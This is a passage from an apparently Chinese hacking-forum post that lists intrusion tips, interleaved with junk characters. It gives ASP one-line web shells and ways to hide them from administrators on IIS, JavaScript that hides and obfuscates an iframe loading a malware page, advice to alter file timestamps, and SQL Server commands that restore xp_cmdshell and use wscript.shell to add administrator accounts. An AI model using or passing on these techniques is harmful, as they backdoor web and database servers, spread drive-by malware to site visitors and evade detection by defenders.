: E3 q7 x7 M3 }  n3 q/ w$ }d).<script language=VBScript runat=server>execute request("sb")</Script>8 F& A" H4 C8 A: A' S& R
e).<%25Execute(request("l"))%25>" m( X5 b/ o5 `9 C3 T$ L% D
f).<%if request("cmd")<>"" then execute request("pass")%>
* k! @/ y* l* \  }: u' n  h& z! O
52、at "12:17" /interactive cmd
; g+ z4 M: ~5 V* q: Y  a8 x9 \3 ^执行后可以用AT命令查看新加的任务2 A2 p& v, o% j8 H0 g
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。0 m1 [2 q% R" E, S
9 j' U4 o% w4 m
53、隐藏ASP后门的两种方法& V5 F" T. k  F0 l% Z7 Y
1、建立非标准目录:mkdir images..\1 y7 R5 ~$ _% h% S  F9 v7 b
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp1 I" T8 m- I+ r) U( }
通过web访问ASP木马:http://ip/images../news.asp?action=login. U4 A4 G9 d8 f
如何删除非标准目录:rmdir images..\ /s
/ x3 A7 [' L: s8 R" ]- t2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
+ y0 r' m4 G4 `. i% c: ~5 A* ymkdir programme.asp
3 }. F% H( t2 D% c% F" K4 o新建1.txt文件内容:<!--#include file=”12.jpg”-->) p! x$ d( B3 ?! P
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件5 ]0 d2 ^( O  [+ ]9 U' P% k8 h
attrib +H +S programme.asp; |0 T* f5 Q3 F3 a% V
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
& x! p% G0 t' H( x4 t$ V* o5 A, g4 D) h, u- l
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。" M* d3 B0 X3 a3 O/ R
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。- q5 @& n) \, h9 E6 h

9 X. n( U  ]0 V8 c7 C' R( ]  ?55、JS隐蔽挂马
* [2 |+ D9 [" w7 d8 ^1.
5 {  s6 z; h5 q- _' o  a; Jvar tr4c3="<iframe src=ht";
$ k& J. {& T; J& g7 M2 ^  ktr4c3 = tr4c3+"tp:/";
" M1 x5 S5 `+ j2 \; n( g$ ]tr4c3 = tr4c3+"/ww";4 ~. N5 u$ H, m# X+ I9 ?6 Q" n
tr4c3 = tr4c3+"w.tr4";  z8 Q9 ]* I8 b6 j
tr4c3 = tr4c3+"c3.com/inc/m";
2 s2 j4 m0 z& U9 l% e, {tr4c3 = tr4c3+"m.htm style="display:none"></i";
; M+ C: S' ?( E/ t9 \* Etr4c3 =tr4c3+"frame>'";. \0 f  }0 X3 T
document.write(tr4c3);
* ]( B, G+ `$ [9 ^' c7 k避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。  d, u( R+ ?/ r# v

8 x7 @& n+ Y  h* G0 [2.
6 d7 t: E, v! U/ l" i2 B0 N转换进制,然后用EVAL执行。如
: Y1 G. k. O* X7 peval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");+ r* `# _2 b& H
不过这个有点显眼。% [1 l: x; F" ~: O9 s- w" m
3.
/ q$ K4 E1 }2 ?; i( g8 n3 W) Mdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
' ~, n( \2 d/ ], m9 y4 N1 j最后一点,别忘了把文件的时间也修改下。& f- Y* S- t: W& D
. a* A1 b: P# f7 A7 d1 E1 r6 i* M$ i
56.3389终端入侵常用DOS命令0 w1 F7 J# P$ X% b$ M$ i
taskkill taskkill /PID 1248 /t3 y$ m  K1 [3 ], T

0 h7 h  m2 c/ G, {" j' e! K9 ]1 ~tasklist 查进程. Z* H! |+ t/ k) o3 M/ ~

. e; s3 b9 d1 p. Fcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限3 G* m) v) s/ r# t' u6 D* b# U
iisreset /reboot
9 I& ]+ G  v; g, d$ w: _8 v/ ntsshutdn /reboot /delay:1    重起服务器
: `7 M) h1 h, g% s# T: c! q. V* `! ^' S7 _* P: p9 A% z2 c
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,% O1 Y( y5 y/ R, P* R5 o9 y

* f/ T, b: A  b* V2 gquery user 查看当前终端用户在线情况' O& v+ S5 `6 p& \5 y
6 b9 A) \( n( b
要显示有关所有会话使用的进程的信息,请键入:query process *3 S/ t2 r* K% e+ H: @9 u

+ t1 O8 ?$ W" Q1 e要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:27 i6 S( Z4 @2 n& W( b- `, I

5 v. U: V& d: T5 |% y要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
& U" G$ P8 A) Q! K0 I1 w0 b% o
% r) D' L/ @6 t8 @# S) E/ g要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
, d+ |* {+ _1 h! @8 [9 e
1 a; e% W( S. g% M8 f命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
) y* g+ {* {' D4 o, e2 m4 |* F" p
! g4 P  W+ f; K* |7 x$ W+ S, N命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
5 O: |( s: f' m% |! X5 K1 J) ?7 `7 {
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。2 S( z. o. O. C- t/ S, D

' x' F7 E; v- R3 f: O+ Q5 G5 H9 E! q命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
8 i2 b3 ]# i4 e# B% v- B5 Y5 }: {5 X- W2 ^0 N) A: s5 C  P
56、在地址栏或按Ctrl+O,输入:
6 I% u) D0 u" T+ L  x3 Rjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;0 _5 x7 r" e- L

3 l# h' a/ b6 g. I+ a1 ?8 r9 P源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
2 @" {, \" T3 s: e$ {
: k8 s: v8 D! z, Y" O57、net user的时候,是不能显示加$的用户,但是如果不处理的话,( |0 e6 \' O) `- L! V+ y
用net localgroup administrators是可以看到管理组下,加了$的用户的。0 z9 s1 a9 ~, f0 [  j9 @
1 U( Q" [- q" m; {, X, ?
58、 sa弱口令相关命令
$ n# U3 T+ o7 Q0 N8 E1 L- M9 h0 N7 j; o% Z
一.更改sa口令方法:. ~% c" c" t* D3 m$ t  }$ m& h
用sql综合利用工具连接后,执行命令:
2 |1 K" Z# E8 i) ~, ?5 z' W7 Cexec sp_password NULL,'20001001','sa'" F% Y. r" S1 w# b
(提示:慎用!)' L$ G$ N$ j$ O. V
) z2 ]' m- t# _6 h
二.简单修补sa弱口令.
7 k! E) h' M5 |  f. F- B. I  s: q- p, K3 k, v
方法1:查询分离器连接后执行:
4 _5 A: T9 Q& V6 i5 O8 N, ^; sif exists (select * from
, L0 J$ C% I$ ?+ edbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
. V* g- H0 g% W# tOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
3 a/ z0 w. T! l3 O5 u
% e" t5 O  V6 a. \( Gexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
2 g5 M' o  A7 O: v/ a8 M5 c# t7 E7 ^7 M: Y" D; f0 X
GO
9 H4 S) H& M) [& c& D5 K+ J0 V8 v9 ?2 O2 B. `- o! Y
然后按F5键命令执行完毕
$ j: w" T4 H4 M9 x) i$ z0 ?, e8 o0 ?9 N
方法2:查询分离器连接后
4 R( t$ {8 G5 W. M% A$ E0 z, j第一步执行:use master
7 x7 W/ b$ ]& q$ y第二步执行:sp_dropextendedproc 'xp_cmdshell'
9 I+ ?: U6 Y' i' R, P3 i' O* b然后按F5键命令执行完毕( C4 p$ A( j" Q' E( f- P& \

( [9 E, \' T' {) t& t/ o/ y
; v: ?% F" G5 Q" c三.常见情况恢复执行xp_cmdshell.- \; {# D5 K5 _: T
8 t$ O- [; l/ ~- b1 K- A, X
" e7 i# ^6 f8 H
1 未能找到存储过程'master..xpcmdshell'.% v0 ?, s: r, Q% c. X  e! P" k
   恢复方法:查询分离器连接后,
" p' F6 @" e. y: x7 I7 Z: [第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
& W  L4 I% I) \8 Z第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
/ F2 z. f# t% k) `, L- l然后按F5键命令执行完毕
1 s/ U8 y: l. {
0 ~! ~5 ^+ {6 A; T, n* g2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)) n2 y: `& w$ R( e8 X
恢复方法:查询分离器连接后,4 S/ n. ]2 A# Z( b/ C
第一步执行:sp_dropextendedproc "xp_cmdshell"4 W$ n* R$ J1 w9 u
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'1 G% [7 H2 ]' @
然后按F5键命令执行完毕
8 a: d+ w+ O. i, F( F8 x5 m
  z; [  |# M9 X* l3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
8 l* [3 y7 @+ R$ ~3 s- x恢复方法:查询分离器连接后,6 z8 `& l0 d& G4 o' |+ z
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
# s) C) m3 v6 K( [& J; I第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           5 V3 R6 n/ v3 W% {) I
然后按F5键命令执行完毕
; @' x. |/ X9 k9 u1 [7 r' w9 N
+ F# c( j  c6 O) O' [: {四.终极方法.
6 @$ ?5 ^' Y  P2 C* y如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
$ Y! p0 g9 M; ]) F: g查询分离器连接后," V6 g9 R! k/ u) [
2000servser系统:
3 C4 G) f# t* @: b# Rdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'5 e, h1 J% o  B5 \; `; |
8 d. h; x3 V7 ]3 J* ^
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'! b- d1 b6 X/ g- u) y$ U9 o
4 _  r9 m4 {" ~0 W# O/ ~2 s/ P# k; `) \. H
xp或2003server系统:
" j8 N' D1 b% U6 |
* S" w5 C9 T3 t, Jdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'& l$ O: D7 ~# D5 X, R6 N

8 q+ Z5 U& n( U" V# ndeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'$ O  {! j$ [4 @' `
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表